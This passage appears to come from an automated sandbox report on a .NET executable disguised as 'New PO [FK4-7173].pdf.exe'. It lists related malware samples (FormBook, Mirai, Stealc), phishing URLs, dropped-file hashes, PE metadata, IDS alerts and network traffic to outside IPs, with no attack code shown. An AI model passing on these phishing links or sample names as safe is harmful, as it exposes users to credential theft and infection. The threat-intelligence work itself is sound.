                                                                        xxTupY4Fr3.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 217.160.0.236
                                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                        • 212.227.67.33
                                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                        • 212.227.67.34
                                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                        • 212.227.67.33
                                                                        xBzBOQwywT.exeGet hashmaliciousFormBookBrowse
                                                                        • 74.208.236.25
                                                                        https://google.com:login@login-zendesk-account.servz.com.pk/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        • 212.227.67.33
                                                                        sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 195.20.246.173
                                                                        NEXINTO-DEbin.mips.elfGet hashmaliciousMiraiBrowse
                                                                        • 212.228.79.8
                                                                        arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                        • 212.229.190.20
                                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                                        • 195.179.84.16
                                                                        splx86.elfGet hashmaliciousUnknownBrowse
                                                                        • 194.64.162.15
                                                                        nabmips.elfGet hashmaliciousUnknownBrowse
                                                                        • 212.228.44.65
                                                                        splm68k.elfGet hashmaliciousUnknownBrowse
                                                                        • 194.163.137.6
                                                                        nklppc.elfGet hashmaliciousUnknownBrowse
                                                                        • 194.233.145.166
                                                                        kkkarm.elfGet hashmaliciousUnknownBrowse
                                                                        • 212.228.15.138
                                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                        • 212.229.141.76
                                                                        botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 194.195.203.143
                                                                        VIMRO-AS15189USSHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.118.17
                                                                        SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.142
                                                                        QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.169
                                                                        foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.189
                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.169
                                                                        w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                        • 67.223.117.189
                                                                        AMAZON-02USIsVcdKSMbE.exeGet hashmaliciousUnknownBrowse
                                                                        • 75.2.60.5
                                                                        SecuriteInfo.com.Win32.Application.Agent.NSIF6L.17895.28880.exeGet hashmaliciousUnknownBrowse
                                                                        • 18.194.106.181
                                                                        tyo2831qq.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 54.171.230.55
                                                                        vsbeps.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                        • 54.171.230.55
                                                                        HrxOpVxK5d.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 3.167.152.61
                                                                        https://kh7hk7t867r6.s3.us-east-2.amazonaws.com/gyg87t8f7g7ff75d5/huu7t76r5trf5e45e/index.htmlGet hashmaliciousUnknownBrowse
                                                                        • 3.5.132.20
                                                                        file.exeGet hashmaliciousLummaC Stealer, StealcBrowse
                                                                        • 18.245.60.53
                                                                        https://bitcoinwisdom.com/these-workers-found-a-giant-snake-you-wont-believe-what-they-found-inside/2/?utm_source=taboola&utm_term=yahoo-aol-mail&utm_medium=cpc&utm_campaign=Snake+US.D_snake&cost=0.13&tblci=GiAmoZnDSKA9Rcvf4CX7BxL2zvlH6pqfvE-XRuuUPfhj0iCA4Woo2fPniM_m2u-_ATDYl18Get hashmaliciousLiteHTTP BotBrowse
                                                                        • 3.165.113.38
                                                                        https://eu-west-1.protection.sophos.com/?d=online-statements.site&u=aHR0cHM6Ly93d3cub25saW5lLXN0YXRlbWVudHMuc2l0ZS9zaWduaW4_dD1leUpoYkdjaU9pSklVekkxTmlKOS5leUowY21GamEybHVaMTkwYjJ0bGJpSTZJalZqWXpoa01UQmxMVEZpTVRNdE5EQTJaQzA1TURVMkxURXlZVFk0WVRSa05EbGhNQ0lzSW1ObGJHd2lPaUpvZEhSd2N6b3ZMM0ZuWW1aM2IzYzJNR1l1WlhobFkzVjBaUzFoY0drdWRYTXRkMlZ6ZEMweUxtRnRZWHB2Ym1GM2N5NWpiMjB2Y0hKdlpDOWhjR2t2Y0docGMyaHBibWRqWVcxd1lXbG5iaUlzSW1OaGJYQmhhV2R1WDNSdmEyVnVJam9pTm1JM05XSTNNRGt0TkRWaVl5MDBOVFpqTFdJeU1HWXRZalJpTXpVeE9UQmxaRFF3SWl3aWRHVnpkRjkwYjJ0bGJpSTZabUZzYzJVc0ltVjRkR1Z5Ym1Gc1gzUnlZV2x1YVc1bklqcG1ZV3h6WlN3aVpHbHlaV04wWDJSbGJHbDJaWEo1SWpwMGNuVmxMQ0pwWVhRaU9qRTNNekV3T0RReE56a3NJbWx6Y3lJNkltaDBkSEJ6T2k4dllYQndMbkJvYVhOb2RHaHlaV0YwTG1OdmJTSXNJbVY0Y0NJNk1UY3pPRGcyTURFM09YMC5qRlY0OGJMNkJuVXNUUWp3ME84MHpaTWZkWXp1X1RiMmoxYTlfYUMwZlhv&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=bWhSZnFlc2Z5WlZLRSt2ZE51Wnk0S0FPcng1NStjNWNXYlFKYWNoMVVQUT0=&h=94894c2300ca4179bc6a5fad2b6f7320&s=AVNPUEhUT0NFTkNSWVBUSVbGzig1wPRd_1oljM8LJU60Hq9VlWBTQiABDwLsqafDogGet hashmaliciousHTMLPhisherBrowse
                                                                        • 18.239.94.33
                                                                        s6QYhBcJtc.exeGet hashmaliciousStealcBrowse
                                                                        • 18.239.83.98

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New PO [FK4-7173].pdf.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1172
                                                                        Entropy (8bit):5.358104835552657
                                                                        Encrypted:false
                                                                        SSDEEP:24:35BWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:vWSU4xympjms4RIoU99tK8NDv
                                                                        MD5:850BFA55DD2B425B26CDEBD8295FD6E1
                                                                        SHA1:8DA3F5AE1F6F02A68FD4B5205ACBD0A2B5C5408F
                                                                        SHA-256:1E87EA8D6E434195349FBB8C60722C01EE563614AE9C806D4B1BF19296478F90
                                                                        SHA-512:E8635D8170E7B2A04EE86A5D8FD69A61A494C84A26065EAA110B8F495BB689DDC25BAA28CB860CB539B0224F9F3A314965DD2A2A6770B5C6D81BC3D5727BC453
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                        C:\Users\user\AppData\Local\Temp\784DRh-0

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\shutdown.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.121297215059106
                                                                        Encrypted:false
                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbi4xwnv.ch2.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk3ot4yc.xzw.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tk1et4hi.jak.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhvjmyzg.vsv.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.948590234967479
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:New PO [FK4-7173].pdf.exe
                                                                        File size:896'000 bytes
                                                                        MD5:f946f99df4c8406ba19b70561c1d53f6
                                                                        SHA1:fdce6ff15295a31ff37c517b90f466e37e272cfd
                                                                        SHA256:bcd2af5fd6fdac5f0bdfcc38acbaa7d941a30cc75004c1f10731d6ad9efa7632
                                                                        SHA512:b7fea932f40954ed577b3c7b65170bad5ec2dc0fbafd051e6c28a49d0ae9a9ebc999081aca0253dc389edb89b7f9e59e2f9add10b190c30b23c4cdc66bb4e073
                                                                        SSDEEP:24576:cBBFvHn4ozNfXSQL+yNbbFSDrDd47DItfVr69ME:6zvHn4ozNSAJEDrDd0DItf4ME
                                                                        TLSH:4415238D3FA9FA32C749577FCC43411545B7C468FA61F36989D8A82A0F7B98DE04A4C2
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.-g....................."........... ........@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:13256c6c6c6c6cec

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4da6ee
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x672DA524 [Fri Nov 8 05:44:04 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xda6a00x4b.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xdc0000x2000.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xd86f40xd8800e653f60867ba8f38c55a97fc83d24eb6False0.9637036753031177data7.953409708030674IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xdc0000x20000x2000691eba4089dec87cd56b3e26d4dd3ed7False0.8829345703125data7.554103280995115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xde0000xc0x200f1085b3717c1f554c9fe231a58093d39False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xdc0c80x1b3fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9697491039426523
                                                                        RT_GROUP_ICON0xddc180x14data1.05
                                                                        RT_VERSION0xddc3c0x30edata0.4373401534526854

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-09T05:35:14.821461+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549709TCP
                                                                        2024-11-09T05:35:53.868488+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549910TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 9, 2024 05:35:28.719211102 CET4977680192.168.2.5194.195.220.41
                                                                        Nov 9, 2024 05:35:28.724908113 CET8049776194.195.220.41192.168.2.5
                                                                        Nov 9, 2024 05:35:28.725054979 CET4977680192.168.2.5194.195.220.41
                                                                        Nov 9, 2024 05:35:28.732023954 CET4977680192.168.2.5194.195.220.41
                                                                        Nov 9, 2024 05:35:28.737072945 CET8049776194.195.220.41192.168.2.5
                                                                        Nov 9, 2024 05:35:29.320390940 CET8049776194.195.220.41192.168.2.5
                                                                        Nov 9, 2024 05:35:29.320408106 CET8049776194.195.220.41192.168.2.5
                                                                        Nov 9, 2024 05:35:29.320525885 CET4977680192.168.2.5194.195.220.41
                                                                        Nov 9, 2024 05:35:29.321809053 CET8049776194.195.220.41192.168.2.5
                                                                        Nov 9, 2024 05:35:29.321860075 CET4977680192.168.2.5194.195.220.41
                                                                        Nov 9, 2024 05:35:29.323733091 CET4977680192.168.2.5194.195.220.41
                                                                        Nov 9, 2024 05:35:29.328528881 CET8049776194.195.220.41192.168.2.5
                                                                        Nov 9, 2024 05:35:52.659753084 CET4991180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:52.664621115 CET804991113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:52.664681911 CET4991180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:52.675026894 CET4991180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:52.679827929 CET804991113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:53.357558012 CET804991113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:53.357621908 CET4991180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:54.190107107 CET4991180192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:54.194916010 CET804991113.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:55.208168983 CET4992780192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:55.212986946 CET804992713.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:55.213097095 CET4992780192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:55.222735882 CET4992780192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:55.227530956 CET804992713.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:55.955554008 CET804992713.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:55.959009886 CET4992780192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:56.736960888 CET4992780192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:56.741745949 CET804992713.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:57.757559061 CET4994280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:57.762345076 CET804994213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:57.762439966 CET4994280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:57.770834923 CET4994280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:57.775640965 CET804994213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:57.775787115 CET804994213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:58.419429064 CET804994213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:35:58.419496059 CET4994280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:59.283874989 CET4994280192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:35:59.288911104 CET804994213.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:36:00.301862001 CET4995680192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:36:00.306704998 CET804995613.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:36:00.306766987 CET4995680192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:36:00.312486887 CET4995680192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:36:00.321547985 CET804995613.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:36:01.353607893 CET804995613.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:36:01.385864019 CET804995613.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:36:01.385971069 CET4995680192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:36:01.386774063 CET4995680192.168.2.513.248.169.48
                                                                        Nov 9, 2024 05:36:01.391535997 CET804995613.248.169.48192.168.2.5
                                                                        Nov 9, 2024 05:36:06.440534115 CET4998680192.168.2.576.223.67.189
                                                                        Nov 9, 2024 05:36:06.448360920 CET804998676.223.67.189192.168.2.5
                                                                        Nov 9, 2024 05:36:06.448448896 CET4998680192.168.2.576.223.67.189
                                                                        Nov 9, 2024 05:36:06.456990004 CET4998680192.168.2.576.223.67.189
                                                                        Nov 9, 2024 05:36:06.463788986 CET804998676.223.67.189192.168.2.5
                                                                        Nov 9, 2024 05:36:07.106833935 CET804998676.223.67.189192.168.2.5
                                                                        Nov 9, 2024 05:36:07.106897116 CET4998680192.168.2.576.223.67.189
                                                                        Nov 9, 2024 05:36:07.971318007 CET4998680192.168.2.576.223.67.189
                                                                        Nov 9, 2024 05:36:07.976180077 CET804998676.223.67.189192.168.2.5
                                                                        Nov 9, 2024 05:36:08.989383936 CET4998780192.168.2.576.223.67.189
                                                                        Nov 9, 2024 05:36:08.994291067 CET804998776.223.67.189192.168.2.5
                                                                        Nov 9, 2024 05:36:08.995062113 CET4998780192.168.2.576.223.67.189
